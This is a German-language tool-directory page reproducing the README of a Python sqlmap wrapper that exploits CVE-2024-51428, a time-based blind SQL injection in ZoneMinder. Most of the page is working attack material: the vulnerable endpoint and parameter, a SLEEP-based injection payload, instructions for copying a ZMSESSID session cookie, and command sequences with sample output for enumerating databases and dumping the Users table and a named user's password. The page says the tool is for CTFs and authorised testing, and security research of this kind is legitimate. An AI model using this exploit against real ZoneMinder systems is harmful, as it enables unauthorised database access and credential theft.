Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-51428-PoC — Wrapper in Python für die Ausnutzung von CVE-2024-51428 in ZoneMinder mittels Blind-SQL-Injection und sqlmap, der die Enumeration von DBs, Tabellen und Datenextraktion mit sauberer Ausgabe automatisiert. | Kitploit
Tools/GitHubGitHub/d1se0/cve-2024-51428-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationCTFPenetrationstestsLernen & Bildung
GitHubd1se0/cve-2024-51428-poc

CVE-2024-51428-PoC

Wrapper in Python für die Ausnutzung von CVE-2024-51428 in ZoneMinder mittels Blind-SQL-Injection und sqlmap, der die Enumeration von DBs, Tabellen und Datenextraktion mit sauberer Ausgabe automatisiert.

Repository anzeigen
11vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-51428 - ZoneMinder Blind SQL Injection PoC

Python-Wrapper für sqlmap konzipiert zur Ausnutzung von CVE-2024-51428 in ZoneMinder.
Dieses Tool automatisiert die Erkennung und Ausnutzung einer Blind SQL Injection-Schwachstelle, während die Ausgabe sauber und auf nützliche Daten fokussiert bleibt.

Das Skript versteckt sqlmap-Logs und zeigt nur relevante Informationen an, wie:

  • Erkannter Injection-Punkt
  • Datenbanknamen
  • Tabellen
  • Ausgelesene Anmeldedaten oder sensible Daten

Dies macht das Tool ideal für CTF-Umgebungen, Demonstrationen und Sicherheitstests.


Übersicht über die Schwachstelle

CVE: CVE-2024-51428
Typ: Blind SQL Injection
Betroffene Software: ZoneMinder
Angriffsvektor: HTTP-GET-Parameter
Parameter: tid

Die Schwachstelle existiert im folgenden Endpunkt:

root@kitploit:~
/zm/index.php?view=request&request=event&action=removetag&tid=

Der tid-Parameter wird nicht ordnungsgemäß bereinigt, bevor er in einer Datenbankabfrage verwendet wird, was Angreifern ermöglicht, SQL-Abfragen einzuschleusen.

Die verwendete Ausnutzungstechnik ist zeitbasierte Blind-SQL-Injection.

Beispiel-Payload, entdeckt von sqlmap:

root@kitploit:~
tid=1 AND (SELECT 3475 FROM (SELECT(SLEEP(5)))BZWD)

Dieser Payload zwingt die Datenbank zum Schlafen, wenn die Abfrage erfolgreich ausgeführt wird, was das Vorhandensein von SQL-Injection bestätigt.


Funktionen

  • Automatische Blind-SQL-Injection-Erkennung
  • Datenbank-Enumeration
  • Tabellen-Enumeration
  • Tabellen-Dump
  • Spaltenfilterung
  • Zeilenfilterung
  • Saubere Ausgabe (sqlmap-Logs verborgen)
  • Entwickelt für CTF- und Pentesting-Labs

Anforderungen

  • Python 3
  • sqlmap

Installieren Sie sqlmap bei Bedarf:

root@kitploit:~
sudo apt install sqlmap

Verwendung

Grundlegende Syntax:

root@kitploit:~
python3 poc.py --url <TARGET_URL> -c '<ZMSESSID_COOKIE>'

Mit diesem Befehl prüfen wir, ob das Ziel verwundbar ist oder nicht

Beispiel:

root@kitploit:~
python3 poc.py --url http://target.htb -c '151fvdqmjkhnkfat7l5epgmd22'

Abrufen des benötigten Cookies

Der Exploit erfordert ein gültiges ZoneMinder-Sitzungs-Cookie.

Schritte:

  1. Öffnen Sie das Ziel in Ihrem Browser
  2. Öffnen Sie die Entwicklertools
  3. Navigieren Sie zu:
root@kitploit:~
Application → Cookies
  1. Suchen Sie das Cookie mit dem Namen:
root@kitploit:~
ZMSESSID
  1. Kopieren Sie dessen Wert und verwenden Sie ihn mit -c

Beispiel:

root@kitploit:~
-c '151fvdqmjkhnkfat7l5epgmd22'

Überprüfen, ob das Ziel verwundbar ist

root@kitploit:~
python3 poc.py --url http://target.htb -c 'COOKIE'

Beispielausgabe:

root@kitploit:~
[*] Checking vulnerability...

Parameter: tid (GET)
Type: time-based blind
Payload: tid=1 AND (SELECT(SLEEP(5)))

[+] TARGET IS VULNERABLE TO BLIND SQL INJECTION

Enumeration von Datenbanken

root@kitploit:~
python3 poc.py --url http://target.htb -c 'COOKIE' -d

Beispielausgabe:

root@kitploit:~
available databases [3]:
information_schema
mysql
zm

Enumeration von Tabellen

root@kitploit:~
python3 poc.py --url http://target.htb -c 'COOKIE' -d -db zm

Beispielausgabe:

root@kitploit:~
Database: zm

Users
Events
Monitors
Storage

Dump einer Tabelle

root@kitploit:~
python3 poc.py --url http://target.htb -c 'COOKIE' -d -db zm -t Users

Dump einer bestimmten Spalte

root@kitploit:~
python3 poc.py --url http://target.htb -c 'COOKIE' -d -db zm -t Users -f Username

Beispiel:

root@kitploit:~
+----------+
| Username |
+----------+
| admin    |
| viewer   |
+----------+

Filtern von Zeilen (WHERE-Klausel)

Sie können Zeilen filtern mit:

root@kitploit:~
-ff <COLUMN> <VALUE>

Beispiel:

root@kitploit:~
python3 poc.py --url http://target.htb -c 'COOKIE' -d -db zm -t Password -ff Username mark

Äquivalentes SQL:

root@kitploit:~
WHERE Username='mark'

Dump des Passworts für einen bestimmten Benutzer

Beispiel:

root@kitploit:~
python3 poc.py \
--url http://target.htb \
-c 'COOKIE' \
-d -db zm -t Users \
-f Password \
-ff Username mark

Interner sqlmap-Befehl:

root@kitploit:~
sqlmap -D zm -T Users -C Password --where="Username='mark'" --dump

Wie das Tool funktioniert

Das Skript fungiert als Wrapper um sqlmap.

Intern durchgeführte Schritte:

  1. Erstellen des verwundbaren Endpunkts
root@kitploit:~
/zm/index.php?view=request&request=event&action=removetag&tid=1
  1. Übergeben des Authentifizierungs-Cookies an sqlmap
  2. Ausführen von sqlmap mit optimierten Optionen:
root@kitploit:~
--threads=10
--technique=T
--batch
  1. Parsen der sqlmap-Ausgabe in Echtzeit
  2. Herausfiltern von Logs und nur Anzeigen von:
  • Injektionsinformationen
  • Datenbanken
  • Tabellen
  • ausgelesene Daten

Beabsichtigte Verwendung

Dieses Tool wurde erstellt für:

  • Capture-The-Flag-Challenges
  • Sicherheitsforschung
  • Bildungszwecke
  • Pentesting-Labs

Haftungsausschluss

Dieses Projekt wird ausschließlich zu Bildungs- und autorisierten Sicherheitstestzwecken bereitgestellt.

Der Autor ist nicht verantwortlich für jeglichen Missbrauch dieses Tools.

Holen Sie stets die entsprechende Genehmigung ein, bevor Sie ein System testen.


Autor

Sicherheitsforschung / CTF-Tooling

Tool herunterladen